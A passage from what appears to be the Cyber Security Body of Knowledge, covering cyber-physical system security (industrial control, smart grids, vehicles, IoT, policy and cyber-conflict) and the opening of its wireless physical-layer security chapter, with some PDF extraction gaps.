traditionally this interface has been analogue (e.g., 4-20 milliamperes), the growing numbers
of sensors and actuators as well as their increased intelligence and capabilities, has given rise
to new Field Communication Networks (FCNs) where the PLCs and other types of controllers
interface with remote Input/Output boxes or directly with sensors and actuators using new
Ethernet-based industrial protocols like ENIP and PROFINET, and wireless networks like
WirelessHART. Several ring topologies have also been proposed to avoid a single point of
failure for these networks, such as the use of Device Level Ring (DLR) over ENIP.
SCN and FCN networks represent Oblivious Transfer (OT) networks, and they have different
communication requirements and different industrial network protocols. While SCN can
tolerate delays of up to the order of seconds, FCN typically require an order of magnitude
of lower communication delays, typically enabling communications between devices with a
period of 400 us.
Intrusion detection is a popular research topic for protecting control systems, and this includes
using network security monitors adapted to industrial protocols [2005, 2007, 2008, 2009, 2010,
2056, 2057], and physics-based anomaly detection [1934, 2011, 2012, 2014, 2058, 2059]. The
layer where we monitor the physics of the system can have a significant impact on the types
of attacks that can be detected [2060].
In particular the adversary can compromise and launch attacks from (1) SCADA servers [2061],
(2) controllers/PLCs [2062], (3) sensors [1933], and (4) actuators [2063], and each of these
attacks can be observable at different layers of the system.
Most of the work on network security monitoring for industrial control systems has deployed
network intrusion detection systems at the SCN. However, if an anomaly detection system
is only deployed in the supervisory control network then a compromised PLC can send ma-
nipulated data to the field network, while pretending to report that everything is normal back
to the supervisory control network. In the Stuxnet attack, the attacker compromised a PLC
(Siemens 315) and sent a manipulated control signal ua (which was different from the original
u, i.e., ua 6= u). Upon reception of ua , the frequency converters periodically increased and
decreased the rotor speeds well above and below their intended operation levels. While the
status of the frequency converters y was then relayed back to the PLC, the compromised
PLC reported a manipulated value ya = 6 y to the control centre (claiming that devices were
operating normally). A similar attack was performed against the Siemens 417 controller [2062],
where attackers captured 21 seconds of valid sensor variables at the PLC, and then replayed
them continuously for the duration of the attack, ensuring that the data sent through the SCN
to the SCADA monitors would appear normal [2062]. A systematic study of the detectability of
various ICS attacks (controller, sensor, or actuator attacks) was given by Giraldo et al. [2060],
and the final recommendation is to deploy system monitors at the field network, as well as at
the supervisory network, and across different loops of the control system.
In addition to attack detection, preventing the system from reaching unsafe states is also
an active area of research [1943, 2064, 2065, 2066, 2067]. The basic idea is to identify that
a control action can cause a problem in the system, and therefore a reference monitor will
prevent this control signal from reaching the physical system. Other research areas include
the retrofitting of security in legacy systems [1988, 2068], and malware in industrial control
devices [2069, 2070]. A concise survey of research in ICS security was given by Krotofil and
Gollmann [2071], and reviews of state-of-the-art practices in the field of ICS security include
the work of Knowles et al. and Cherdantseva et al. [1980, 2072].
A problem for studying industrial control systems is the diversity of platforms, including the
diversity of devices (different manufacturers with different technologies) and applications
(water, chemical systems, oil and gas, etc.). Therefore one of the big challenges in this space
is the reproducibility of results and the generality of industrial control testbeds [2073].
While the current power grid architecture has served well for many years, there is a growing
need to modernise the world’s electric grids to address new requirements and to take ad-
vantage of the new technologies. This modernisation includes the integration of renewable
sources of energy, the deployment of smart meters, the exchange of electricity between
consumers and the grid, etc. Figure 21.6 illustrates some of these concepts. The rationale for
modernising the power grid includes the following reasons:
Wide Area
Monitoring
Non Smart
Renewable Phasor Relays
Measurement
Large Capacity
Unit
Batteries
Customers
Smart Meter Renewable
Energy
Energy
Batteries
Management
One-way electricity flow Smart Meter Systems
Two-way electricity flow
Smart
Appliances
Plug-in Vehicles
Efficiency: One of the main drivers of the smart grid programs is the need to make more
efficient use of the current assets. The peak demand for electricity is growing every year and
so utility companies need to spend more money each year in new power plants and their
associated infrastructures. However, the peak demand is only needed 16% of the time and so
the equipment required to satisfy this peak demand will remain idle for the rest of the time.
One of the goals for the smart grid is to change the grid from load following to load shaping
by giving incentives to consumers for reducing electricity consumption at the times of peak
demand. Reducing peak demand – in addition to increasing the grid stability – can enable
utilities to postpone or avoid the construction of new power stations. The control or incentive
actions used to shape the load is usually called Demand Response.
Efficiency also deals with the integration of the new and renewable generation sources, such
as wind and solar power with the aim of reducing the carbon footprint.
Reliability: The second main objective of modernising the power grid is reliability, especially at
the distribution layer (the transmission layer is more reliable). By deploying new sensors and
actuators throughout the power grid, operators can receive real-time, fine-grained data about
the status of the power grid, that enables better situational awareness, faster detection of
faults (or attacks), and better control of the system, resulting in fewer outages. For example,
the deployment of smart meters is allowing distribution utilities to automatically identify the
location and source of an outage.
Consumer choice: The third objective is to address the lack of transparency the current power
grid provides to consumers. Currently, most consumers receive only monthly updates about
their energy usage. In general, consumers do not know their electricity consumption and
prices that they are paying at different times of the day. They are also not informed about
other important aspect of their consumption such as the proportion of electricity that was
generated through renewable resources. Such information can be used to shape the usage
pattern (i.e., the load). One of the goals of the smart grid is to offer consumers real-time data
and analytics about their energy use. Smart appliances and energy management systems will
automate homes and businesses according to consumer preferences, such as cost savings
or by making sure more renewable energy is consumed.
To achieve these objectives, the major initiatives associated with the smart grid are the ad-
vanced metering infrastructure, demand response, transmission and distribution automation,
distributed energy resources, and the integration of electric vehicles.
While modernising the power grid will bring many advantages, it can also create new threat
vectors. For example, by increasing the amount of collected consumer information, new
forms of attack will become possible [2083]. Smart grid technologies can be used to infer the
location and behaviour of users including if they are at home, the amount of energy that they
consume, and the type of devices they own [2084, 2085]).
In addition to new privacy threats, another potential new attack has been referred to as
load-altering attack. Load-altering attacks have been previously studied in demand-response
systems [2086, 2087, 2088, 2089, 2090, 2091]. Demand-response programs provide a new
mechanism for controlling the demand of electricity to improve power grid stability and
energy efficiency. In their basic form, demand-response programs provide incentives (e.g., via
dynamic pricing) for consumers to reduce electricity consumption during peak hours. Currently,
these programs are mostly used by large commercial consumers and government agencies
managing large campuses and buildings, and their operation is based on informal incentive
signals via phone calls by the utility or by the demand-response provider (e.g., a company
such as Enel X) asking the consumer to lower their energy consumption during the peak
times. As these programs become more widespread (targeting residential consumers) and
automated (giving utilities or demand-response companies the ability to directly control the
load of their customers remotely) the attack surface for load-altering attacks will increase. The
attacks proposed consider that the adversary has gained access to the company controlling
remote loads and can change a large amount of the load to affect the power system and
cause either inefficiencies to the system, economic profits for the attacker, or potentially
cause enough load changes to change the frequency of the power grid and cause large-scale
blackouts. Demand-response systems can be generalised by transactive energy markets,
where prosumers (consumers with energy generation and storage capabilities) can trade
energy with each other, bringing their own privacy and security challenges [2092].
More recently Soltan et al. [2093] studied the same type of load-altering attacks but when the
attacker creates a large-scale botnet with hundreds of thousands of high-energy IoT devices
(such as water heaters and air conditioners). With such a big botnet the attacker can cause (i)
frequency instabilities, (ii) line failures, and (iii) increased operating costs. A followup work
by Huang et al. [2094] showed that creating a system blackout—which would require a black
start period of several days to restart the grid—or even a blackout of a large percentage of the
bulk power grid can be very difficult in part because the power grid has several protections to
load changes, including under-frequency load shedding.
Software problems in the sensors of vehicles can cause notorious failures, as the Ariane 5
rocket accident [2107], which was caused by software in the inertial navigation system shut
down causing incorrect signals to be sent to the engines. With advances in manufacturing
and modern sensors, we are starting to see the proliferation of Unmanned Vehicles (UVs) in
the consumer market as well as across other industries. Devices that were only available to
government agencies have diversified their applications ranging from agricultural manage-
ment to aerial mapping and freight transportation [2108]. Out of all the UVs available in the
commercial market (aerial, ground and sea vehicles) unmanned aerial vehicles seem to be
the most popular kind with a projected 11.2 billion dollar global market by 2020 [2109].
The expansion of unmanned aerial vehicles has increased security and privacy concerns. In
general, there is a lack of security standards for drones and it has been shown that they are
vulnerable to attacks that target either the cyber and/or physical elements [2052, 2110]. From
the point of view of privacy, drones can let users spy on neighbours [2111, 2112], and enable
literal helicopter parenting [2113].
Attacks remotely accessing someone else’s drone (e.g., a neighbour) to take photos or videos,
stealing drones wirelessly (e.g., an attacker in a vehicle can take over a drone and ask it to
follow the vehicle), and taking down a drone operated by someone else (which can lead to
charges like mishandling a drone in public, which in turn has resulted in reckless endangerment
convictions) [1939].
UVs have multiple sensors that aid them to assess their physical environments such as
accelerometers, gyroscopes, barometers, GPS and cameras. While reliance on sensor data
without any form of validation has proven to be an effective trade-off in order to maintain the
efficiency demands of real-time systems, it is not a sustainable practice as UVs become more
pervasive. Transduction attacks on sensors have shown that accelerometers, gyroscopes,
and even cameras used by drones for stabilisation can be easily attacked, causing the drone
to malfunction, crash, or even be taken over by the attacker [1951, 1998, 2114].
Even on many operational warships, remote monitoring of equipment is now done with a
hardwired LAN by systems such as the Integrated Condition Assessment System (ICAS) [2115].
ICAS are generally installed with connections to external Programmable Logic Controllers
(PLCs), which are used in Supervisory Control and Data Acquisition (SCADA) systems to direct
the movement of control equipment that performs actual manipulation of physical devices in
the ship such as propulsion and steering (rudder) devices [2115, 2116]. Therefore, the secure
operation of ships is highly related to the security of industrial control systems.
For ground vehicles, one of the areas of interest is the security of the Controller Area Network
(CAN). The CAN system is a serial broadcast bus designed by Bosch in 1983 to enable the
communication of Electrical Control Units (ECUs) in cars. Examples of ECUs include brake
systems, the central timing module, telematic control units, gear control, and engine control.
The CAN protocol, however, does not have any security mechanism, and therefore an attacker
who can enter the CAN bus in a vehicle (e.g., through a local or remote exploit) can spoof
any ECU to ignore the input from drivers, and disable the brakes or stop the engine [2117].
Therefore, research has considered ways to retrofit lightweight security mechanisms for
CAN systems [1791], or how to detect spoofed CAN messages based on the physical-layer
characteristics of the signal [2118] (voltage level profiles, timing, frequency of messages, etc.).
However, the security of some of these systems remains in question [2119].
Autonomous vehicles will also face new threats, for example, a malicious vehicle in an auto-
mated platoon can cause the platoon to behave erratically, potentially causing accidents [2120].
Finally, new functionalities like a remote kill-switch can be abused by attackers, for example,
an attacker remotely deactivated hundreds of vehicles in Austin, Texas, leaving their owners
without transportation [2121].
in direct contact with the patient. This “secret” information is then used by the programmer
and the IMD as a fuzzy password to bootstrap their security association.
A key challenge is to make sure that the biometric signal being used to give access via
touch-to-access, is not remotely observable. However, heart beats can be inferred with side
information including a webcam [2128], and an infrared laser [2129].
Security goes beyond implantable devices. As healthcare computer and software infrastructure
introduces new technology, the industry will need to increase its security efforts. Medical data
is a prime target for theft and privacy violations, and denial of service attacks in the form of
ransomware [2130].
Several of the security solutions for consumer IoT have proposed the idea of having a cen-
tralised IoT secure hub that mediates the communications between IoT devices in a home,
and the Internet [2137]. One of the problems of relying on an external device to mediate
IoT communications is that the connections between IoT device and the cloud servers may
be encrypted, and therefore this hub will need to make security decisions with encrypted
traffic [2138]. On the other hand, end-to-end encrypted communications can also prevent
consumers from auditing their IoT devices to make sure they are not violating their privacy
expectations. One option to address this problem is to ask the vendor of the IoT device to
disclose their key (and rotate their key) to a trusted third party (called “auditor”) that can
decrypt and show the results to the owners of the data [2139].
In short, the proliferation of vulnerable IoT devices is raising new security and privacy concerns,
while making IoT devices attractive to attackers. Insecurities in these devices range from
insecure-by-design implementations (e.g., devices that have backdoors for troubleshooting)
to their inability to apply software updates to patch vulnerable firmware. One of the biggest
problems for improving the security of IoT and CPSs is that market forces do not incentivise
vendors to compete for better security. In the next section we will discuss the causes of this
lack of security and some potential solutions.
will stifle innovation, and that more regulation tends to create a culture of compliance instead
of a culture of security.
Some states in the US are starting to take regulation into their hands; for example, the recently
proposed California Senate Bill SB-327 will make California the first state in the US with an
IoT cyber security law—starting in 2020, any manufacturer of a device that connects “directly
or indirectly” to the Internet must equip it with “reasonable” security features, designed to
prevent unauthorised access, modification, or information disclosure.
The European Union Agency for cyber security proposed the EU Network and Information
Security directive [2146] as the first piece of EU-wide cyber security legislation, where operators
of essential services such as those outlined in this KA have to comply with these new sets of
standards.
Another alternative to imposing regulation broadly, is to use the governments’ “power of the
purse” by mandating cyber security standards only to companies that want to do business
with the government. The goal would be that once the best security practices are developed
to meet the standards for working with the government, then they will spread to other markets
and products. This approach is a reasonable balance between incentives and regulation. Only
CPS and IoT vendors working with the Federal government will have to follow specific security
standards, but once they are implemented, the same security standards will benefit other
markets where they reuse the technologies.
One of the notable exceptions to the lack of regulation is the nuclear energy industry. Because
of the highly safety-critical nature of this industry, nuclear energy is highly regulated in general,
and in cyber security standards in particular, with processes such as the Office for Nuclear
Regulation (ONR) Security Assessment Principles in the UK [2147].
Incentives: A complementary way to nudge companies to improve their cyber security posture
is for governments to nurture a cyber-insurance market for CPS protection. So, instead of
asking companies to follow specific standards, governments would demand firms to have
cyber-insurance for their operations [2148, 2149, 2150, 2151]. There is a popular view that under
certain conditions, the insurance industry can incentivise investments in protection [2152]. The
idea is that premiums charged by the insurance companies would reflect the cyber security
posture of CPS companies; if a company follows good cyber security practices, the insurance
premiums would be low, otherwise, the premiums would be very expensive (and this would in
principle incentivise the company to invest more in cyber security protections). It is not clear
if this cyber-insurance market will grow organically, or if it would need to be mandated by the
government.
It is unclear if government incentives to improve security in CPSs will require first a catastrophic
cyber-attack, but it appears that, in the future, the choice will no longer be between government
regulation and no government regulation, but between smart government regulation and stupid
regulation [2140].
21.4.2 Cyber-Conflict
Computer networks enable an extension to the way we interact with others, and any conflict
in the real-world, will have its representation in cyberspace; including (cyber-)crime, activism,
bullying, espionage, and war [1916].
Cybercriminals compromise computers anywhere they can find them (even in control sys-
tems). These attacks may not be targeted (i.e., they do not have the intention of harming
control systems), but may cause negative side effects: control systems infected with malware
may operate inappropriately. The most famous non-targeted attack on control systems oc-
curred in 2003, when the Slammer worm affected the computerised safety monitoring system
at the Davis-Besse nuclear power plant in the US. While the plant was not connected to the
Internet, the worm entered the plant network via a contractor’s infected computer connected by
telephone directly to the plant’s network, thereby bypassing the firewall [1954]. A more recent
example of a non-targeted attack occurred in 2006, when a computer system that managed
the water treatment operations of a water filtering plant near Harrisburgh Pensylvania, was
compromised and used to send spam and redistribute illegal software [1955]. More recently,
ransomware has also been used to attack CPSs, like the attack on the Austrian hotel [1961],
where guests were unable to get their room keys activated until the hotel paid the ransom.
Disgruntled employees are a major source of targeted computer attacks against control
systems [780, 1960, 1963]. These attacks are important from a security point of view because
they are caused by insiders: individuals with authorised access to computers and networks
used by control systems. So, even if the systems had proper authentication and authorisation,
as well as little information publicly available about them, attacks by insiders would still be
possible. Because disgruntled employees generally act alone, the potential consequences
of their attacks may not be as damaging as the potential harm caused by larger organised
groups such as terrorists and nation states.
Terrorists, and activists are another potential threat to control systems. While there is no
concrete evidence that terrorists or activists have targeted control systems via cyber-attacks,
there is a growing threat of such an attack in the future.
Nation states are establishing military units with computer security expertise for any future
conflicts. For example, the US established Cyber Command [2153] to conduct full spectrum
operations (offensive capabilities) in 2009, and several other countries also announced similar
efforts around the same time. The role of computer networks in warfare has been a topic of
academic discussion since 1998 [2154], and CPSs are playing a foundational difference on
how wars are waged, from robotic units and unmanned vehicles supporting soldiers in the
field, to discussions of cyberwar [2155].
In addition to land, air, sea and space, cyberspace is now considered by many nations as an
additional theatre of conflict. International treaties have developed public international law
concerning two main principles in the law of war (1) jus ad bellum the right to wage a war, and
(2) jus in bellum acceptable wartime conduct. Two sources have considered how the law of
war applies to cyberspace [2141]: (1) The Tallinn Manual, and (2) the Koh Speech.
The Tallinn manual is a non-binding study by NATO’s cooperative cyber-defence center of
excellence, on how the law of war applies to cyber conflicts, and the Koh Speech was a
speech given by Harold Koh, a US State Department legal advisor, which explained how the
US interprets international law applied to cyberspace. Both of these sources agree that a key
reason to authorise the use of force (jus ad bellum) as a response to a cyber operation, is
when the physical effects of a cyber-attack are comparable to kinetic effects of other armed
conflicts, for example, when a computer attack triggers a nuclear plant meltdown, opens a dam
upriver, or disables air-traffic control. The argument is that the effects of any of these attacks
are similar to what a missile strike from an enemy would look like. In contrast, when there is
no physical harm, the problem of determining when a cyber-attack can be considered a use of
force by the enemy is unresolved, so cyber-attacks to the financial, or election infrastructure
of a nation may not clear the bar to be considered an act of war.
Once nations are engaged in war, the question is how to leverage computer attacks in a way
that is consistent with acceptable wartime conduct (jus in bellum). The conventional norm is
that attacks must distinguish between military and non-military objectives. Military objectives
can include war-fighting, war-supporting, and war-sustaining efforts. The problem in attacking
critical infrastructures is that some of the infrastructures supporting these efforts are in
dual-use by the military as well as by the civilian population. For example, a large percentage
of military communications in the US use civilian networks at some stage, and the power grid
supports military as well as civilian infrastructures.
Another factor to consider in designing CPS attacks is that the “law of war” in general prohibits
uncontrollable or unpredictable attacks, in particular those that deny the civilian population
of indispensable objects, such as food or water. While physical weapons have a limited
geographical area of impact, cyberweapons can have more uncontrollable side-effects; for
example, worms can replicate and escape their intended target network and infect civilian
infrastructures. Therefore, nations will have to extensively test any cyberweapon to minimise
unpredictable consequences.
In short, any future conflict in the physical world will have enabling technologies in the cyber-
world, and computer attacks may be expected to play an integral part in future conflicts. There
is a large grey area regarding what types of computer attacks can be considered an act of
force, and a future challenge will be to design cyber-attacks that only target military objectives
and minimise civilian side effects. At the same time, attack attribution in cyber-space will
be harder, and nation-states might be able to get away with sabotage operations without
facing consequences. It is a responsibility of the international community to design new legal
frameworks to cover cyber-conflicts, and for nation states to outline new doctrines covering
how to conduct cyber-operations with physical side effects.
Finally, cyberwar is also related to the discussion in the last section about cyber-insurance. For
example, after the NotPetya cyberattack in 2017 [2156], several companies who had purchased
cyber-insurance protections sought to get help from their insurance companies to cover part
of their loses. However, some insurance companies denied the claims citing a war exclusion
which protects insurers from being saddled with costs related to damage from war. Since
then insurers have been applying the war exemption to avoid claims related to digital attacks 2 .
This type of collateral damage from cyber-attacks might be more common in the future, and
presents a challenge for insurance industries in their quest to quantify the risk of correlated
large-scale events.
2
https://www.nytimes.com/2019/04/15/technology/cyberinsurance-notpetya-attack.html
standard builds closely on the UK’s Code of Practice for Consumer IoT Security [2160]. Another
more specific IoT standard by the Internet Engineering Task Force (IETF) for IoT devices is
the Manufacturer Usage Description (MUD) standard [2161]. The goal of this standard is to
automate the creation of network white lists, which are used by network administrators to
block any unauthorised connection by the device. Other IoT security standards being devel-
oped by the IETF include protocols for communications security, access control, restricting
communications, and firmware and software updates [2162].
All these industry efforts and standards have essentially three goals: (1) create awareness of
security issues in control systems, (2) help operators of control systems and security officers
design a security policy, and (3) recommend basic security mechanisms for prevention
(authentication, access controls, etc), detection, and response to security breaches. For the
most part industry efforts for protecting CPSs are based on the same technical principles
from general Information Technology systems. Therefore, industry best practices are behind
general IT security best practices and the most recent CPS security research discussed in
this KA. We hope that in the next decade CPS security research becomes mature enough to
start having an impact on industry practices.
CONCLUSIONS
As technology continues to integrate computing, networking, and control elements in new
cyber-physical systems, we also need to train a new generation of engineers, computer
scientists, and social scientists to be able to capture the multidisciplinary nature of CPS
security, like transduction attacks. In addition, as the technologies behind CPS security mature,
some of them will become industry-accepted best practices while others might be forgotten. In
2018, one of the areas with greatest momentum is the industry for network security monitoring
(intrusion detection) in cyber-physical networks. Several start-up companies in the US, Europe,
and Israel offer services for profiling and characterising industrial networks, to help operators
better understand what is allowed and what should be blocked. On the other hand, there are
other CPS security research areas that are just starting to be analysed, like the work on attack
mitigation, and in particular, the response to alerts from intrusion detection systems.
We are only at the starting point for CPS security research, and the decades to come will bring
new challenges as we continue to integrate physical things with computing capabilities.
[2163]
Other
21.1 Cyber-Physical Systems and their Security Risks
21.1.1 Characteristics of CPS c1 [1906]
21.1.2 Protections Against Natural Events and Accidents [1907]
21.1.3 Security and Privacy Concerns [1908]
21.2 Crosscutting Security
21.2.1 Preventing Attacks c6,c9 [1973]
21.2.2 Detecting Attacks c18 [1974]
21.2.3 Mitigating Attacks [1975]
21.3 CPS Domains
21.3.1 Industrial Control Systems [2048]
21.3.2 Electric Power Grids c25 [2049, 2050]
21.3.3 Transportation Systems and Autonomous Vehicles c26, c29 [2051, 2052]
21.3.4 Robotics and Advanced Manufacturing [2053]
21.3.5 Medical Devices c27 [2054]
21.3.6 The Internet of Things [1973]
21.4 Policy and Political Aspects of CPS Security
21.4.1 Incentives and Regulation [2140]
21.4.2 Cyber-Conflict [2124, 2141]
21.4.3 Industry Practices and Standards [2048]
741
The Cyber Security Body Of Knowledge
www.cybok.org
INTRODUCTION
This Knowledge Area is a review of the most relevant topics in wireless physical layer security.
The physical phenomenon utilized by the techniques presented in this Knowledge Area is the
radiation of electromagnetic waves. The frequencies considered hereinafter consist of the
entire spectrum that ranges from a few Hertz to frequencies beyond those of visible light
(optical spectrum). This Knowledge Area covers concepts and techniques that exploit the
way these signals propagate through the air and other transmission media. It is organised
into sections that describe security mechanisms for wireless communication methods as
well as some implications of unintended radio frequency emanations.
Since most frequencies used for wireless communication reside in the radio frequency spec-
trum and follow the well-understood laws of radio propagation theory, the majority of this
Knowledge Area is dedicated to security concepts based on physical aspects of radio fre-
quency transmission. The chapter therefore starts with an explanation of the fundamental
concepts and main techniques that were developed to make use of the wireless communi-
cation layer for confidentiality, integrity, access control and covert communication. These
techniques mainly use properties of physical layer modulations and signal propagation to
enhance the security of systems.
After having presented schemes to secure the wireless channel, the Knowledge Area continues
with a review of security issues related to the wireless physical layer, focusing on those aspects
that make wireless communication systems different from wired systems. Most notably, signal
jamming, signal annihilation and jamming resilience. The section on jamming is followed
by a review of techniques capable of performing physical device identification (i.e., device
fingerprinting) by extracting unique characteristics from the device’s (analogue) circuitry.
Following this, the chapter continues to present approaches for performing secure distance
measurements and secure positioning based on electromagnetic waves. Protocols for dis-
tance measurements and positioning are designed in order to thwart threats on the physical
layer as well as the logical layer. Those attack vectors are covered in detail, together with
defense strategies and the requirements for secure position verification.
Then, the Knowledge Area covers unintentional wireless emanations from devices such as
from computer displays and summarises wireless side-channel attacks studied in literature.
This is followed by a review on spoofing of analogue sensors. Unintentional emissions are
in their nature different from wireless communication systems, especially because these
interactions are not structured. They are not designed to carry information, however, they also
make use of—or can be affected by—electromagnetic waves.
Finally, after having treated the fundamental concepts of wireless physical security, this
Knowledge Area presents a selection of existing communication technologies and discusses
their security mechanisms. It explains design choices and highlights potential shortcomings
while referring to the principles described in the earlier sections. Included are examples from
near-field communication and wireless communication in the aviation industry, followed by
the security considerations of cellular networks. Security of global navigation systems and of
terrestrial positioning systems is covered last since the security goals of such systems are
different from communication systems and are mainly related to position spoofing resilience.
CONTENT
dynamic thresholds.
Information reconciliation phase: Since the quantisation phase is likely to result in disagreeing
sequences at Alice and Bob, they need to reconcile their sequences to correct for any errors.
This is typically done leveraging error correcting codes and privacy amplification techniques.
Most schemes use simple level-crossing algorithms for quantisation and do not use coding
techniques. However, if the key derivation uses methods based on channel states whose
distributions are not necessarily symmetric, more sophisticated quantisation methods, such
as approximating the channel fading phenomena as a Gaussian source, or (multi-level) coding
is needed [2165].
Key Verification Phase: In this last phase, communicating parties confirm that they established
a shared secret key. If this step fails, the parties need to restart key establishment.
Most of the research in physical-layer techniques has been concerned with the choice of
channel properties and of the quantisation technique. Even if physical-layer key establishment
techniques seem attractive, many of them have been shown to be vulnerable to active, physi-
cally distributed and multi-antenna adversaries. However, in a number of scenarios where the
devices are mobile, and where the attacker is restricted, they can be a valuable replacement
or enhancement to traditional public-key key establishment techniques.
Initially, physical-layer key establishment techniques were proposed in the context of single-
antenna devices. However, with the emergence of MIMO devices and beam-forming, re-
searchers have proposed to leverage these new capabilities to further secure communication.
Two basic techniques that were proposed in this context are orthogonal blinding and zero
forcing. Both of these techniques aim to enable the transmitter to wirelessly send confidential
data to the intended receiver, while preventing the co-located attacker from receiving this
data. Although this might seem infeasible, since as well as the intended receiver, the attacker
can receive all transmitted packets. However, MIMO systems allow transmitters to ’steer’
the signal towards the intended receiver. For beam-forming to be effective, the transmitter
needs to know some channel information for the channels from its antennas to the anten-
nas of the receiver. As described in [2167], these channels are considered to be secret from
the attacker. In Zero-Forcing, the transmitter knows the channels to the intended receiver
as well as to the attacker. This allows the transmitter to encode the data such that it can
be measured at the receiver, whereas the attacker measures nothing related to the data. In
many scenarios, assuming the knowledge of the channel to the attackers is unrealistic. In
Orthogonal Blinding, the transmitter doesn’t know the channel to the attacker, but knows the
channels to the receiver. The transmitter then encodes the data in the way that the receiver
can decode the data, whereas the attacker will receive data mixed with random noise. The
attacker therefore cannot decode the data. In order to communicate securely, the transmitter
and the receiver do not need to share any secrets. Instead, the transmitter only needs to know
(or measure) the channels to the intended receivers. Like physical-layer key establishment
techniques, these techniques have been show to be vulnerable to multi-antenna and physically
distributed attackers. They were further shown to be vulnerable to known-plaintext attacks.
Friendly jamming was originally proposed for the protection of those medical implants (e.g.,
already implanted pacemakers) that have no abilities to perform cryptographic operations.
The main idea was that the collaborating device (i.e. ’the shield’) would be placed around the
user’s neck, close to the pacemaker. This device would then simultaneously receive and jam
all communication from the implant. The shield would then be able to forward the received
messages to any other authorised device using standard cryptographic techniques.
receiver and transmitter. This allows the legitimate receiver to recombine the signal while an
eavesdropper is unable to do so.
Covert communication is parasitic and leverages legitimate and expected transmissions
to enable unobservable communication. Typically, such communication hides within the
expected and tolerated deviations of the signal from its nominal form. One prominent example
is embedding of communicated bits within the modulation errors.
be non-zero. In fact, if the receiver is broadband, it can recover all the messages transmitted by
the sender. UFH however, introduces new challenges. Given that the sender and the receiver
are not synchronised, and short message fragments transmitted within each hop are not
authenticated, the attacker can inject fragments that make the reassembly of the packets
infeasible. To prevent this, UFH includes fragment linking schemes that make this reassembly
possible even under poisoning.
UDSSS follows the principle of DSSS in terms of spreading the data using spreading sequences.
However, in contrast to anti-jamming DSSS where the spreading sequence is secret and shared
exclusively by the communication partners, in UDSSS, a public set of spreading sequences is
used by the sender and the receivers. To transmit a message, the sender repeatedly selects a
fresh, randomly selected spreading sequence from the public set and spreads the message
with this sequence. Hence, UDSSS neither requires message fragmentation at the sender
nor message reassembly at the receivers. The receivers record the signal on the channel
and despread the message by applying sequences from the public set, using a trial-and-error
approach. The receivers are not synchronised to the beginning of the sender’s message and
thus record for (at least) twice the message transmission time. After the sampling, the receiver
tries to decode the data in the buffer by using code sequences from the set and by applying a
sliding-window protocol.
from signals, for example, by means of some spectral transformations such as Fast Fourier
Transform (FFT) or Discrete Wavelet Transform (DWT), without a-priori knowledge of a spe-
cific signal characteristic. For instance, wavelet transformations have been applied on signal
turn-on transients and different data-related signal regions. The Fourier transformation has
also been used to extract features from the turn-on transient and other technology-specific
device responses. Both predefined and inferred features can be subject to further statistical
analysis in order to improve their quality and distinguishing power.
complexity and low power consumption, phase based ranging is used in several commercial
products.
Finally, the time taken for the radio waves to travel from one point to another can be used
to measure the distance between the devices. In RF-based RTT based distance estimation
the distance d between two entities is given by d = (trx − ttx ) × c, where c is the speed
of light, ttx and trx represent the time of transmission and reception respectively. The mea-
sured time-of-flight can either be one way time-of-flight or a round-trip time-of-flight. One way
time-of-flight measurement requires the clocks of the measuring entities to be tightly synchro-
nised. The errors due to mismatched clocks are compensated in the round-trip time-of-flight
measurement.
The precise distance measurement largely depends on the system’s ability to estimate the
time of arrival and the physical characteristics of the radio frequency signal itself. The ranging
precision is roughly proportional to the bandwidth of the ranging signal. Depending on the
required level of accuracy, time-of-flight based distance measurement systems use either
Impulse-Radio Ultra Wideband (IR-UWB) or Chirp-Spread Spectrum (CSS) signals. IR-UWB
systems provide centimeter-level precision while the precision of CSS systems is of the order
of 1–2m. There are a number of commercially available wireless systems that use chirp and
UWB round-trip time-of-flight for distance measurement today.
In Time of Flight (ToF) based ranging systems, the distance is estimated based on the time
elapsed between the verifier transmitting a ranging packet and receiving an acknowledgement
back from the prover. In order to reduce the distance measured, an attacker must decrease
the signal’s round trip time of flight. Based on the implementation, an attacker can reduce the
estimated distance in a time-of-flight based ranging system in more than one way. Given that
the radio signals travel at a speed of light, a 1 ns decrease in the time estimate can result in a
distance reduction of 30cm.
The first type of attack on time-of-flight ranging leverages the predictable nature of the data
contained in the ranging and the acknowledgement packets. A number of time-of-flight ranging
systems use pre-defined data packets for ranging, making it trivial for an attacker to predict
and generate their own ranging or acknowledgment signal. An attacker can transmit the
acknowledgment packet even before receiving the challenge ranging packet. Several works
have shown that the de-facto standard for IR-UWB, IEEE 802.15.4a does not automatically
provide security against distance decreasing attacks. In [2187] it was shown that an attacker
can potentially decrease the measured distance by as much as 140 meters by predicting the
preamble and payload data with more than 99% accuracy even before receiving the entire
symbol. In a ’Cicada’ attack, the attacker continuously transmits a pulse with a power greater
than that of the prover. This degrades the performance of energy detection based receivers,
resulting in reduction of the distance measurements. In order to prevent such attacks it is
important to avoid predefined or fixed data during the time critical phase of the distance
estimation scheme.
In addition to having the response packet dependent on the challenge signal, the way in
which these challenge and response data are encoded in the radio signals affects the security
guarantees provided by the ranging or localisation system. An attacker can predict the bit
(early detect) even before receiving the symbol completely. Furthermore, the attacker can
leverage the robustness property of modern receivers and transmit arbitrary signal until the
correct symbol is predicted. Once the bit is predicted (e.g., early-detection), the attacker stops
transmitting the arbitrary signal and switches to transmitting the bit corresponding to the
predicted symbol, i.e., the attacker ’commits’ to the predicted symbol, commonly known as
late commit. In such a scenario, the attacker needn’t wait for the entire series of pulses to be
received before detecting the data being transmitted. After just a time period, the attacker
would be able to correctly predict the symbol.
As described previously, round-trip time-of-flight systems are implemented either using chirp or
impulse radio ultrawideband signals. Due to their long symbol lengths, both implementations
have been shown to be vulnerable to early-detect and late-commit attacks. In the case of
chirp-based systems, an attacker can decrease the distance by more than 160 m and in some
scenarios even up to 700 m. Although IR-UWB pulses are of short duration (typically 2–3 ns
long), data symbols are typically composed of a series of UWB pulses. Furthermore, IEEE
802.15.4a IR-UWB standard allows long symbol lengths ranging from 32 ns to as large as 8µs.
Therefore, even the smallest symbol length of 32 ns allows an attacker to reduce the distance
by as much as 10 m by performing early-detect and late-commit attacks. Thus, it is clear that
in order to guarantee proximity and secure a wireless proximity system against early detect
and late-commit attacks, it is necessary to keep the symbol length as short as possible.
Design of a physical layer for secure distance measurement remains an open topic. However,
research so far has yielded some guiding principles for its design. Only radio RTT with single-
pulse or multi-pulse UWB modulation has been shown to be secure against physical layer
attacks. As a result, the IEEE 802.15.4z working group started the standardization of a new
x
V1 V2
y
P P
V3
Figure 22.2: If the computed location of the prover is in the verification triangle, the verifiers
conclude that this is a correct location. To spoof the position of prover inside the triangle, the
attacker would need to reduce at least one of the distance bounds.
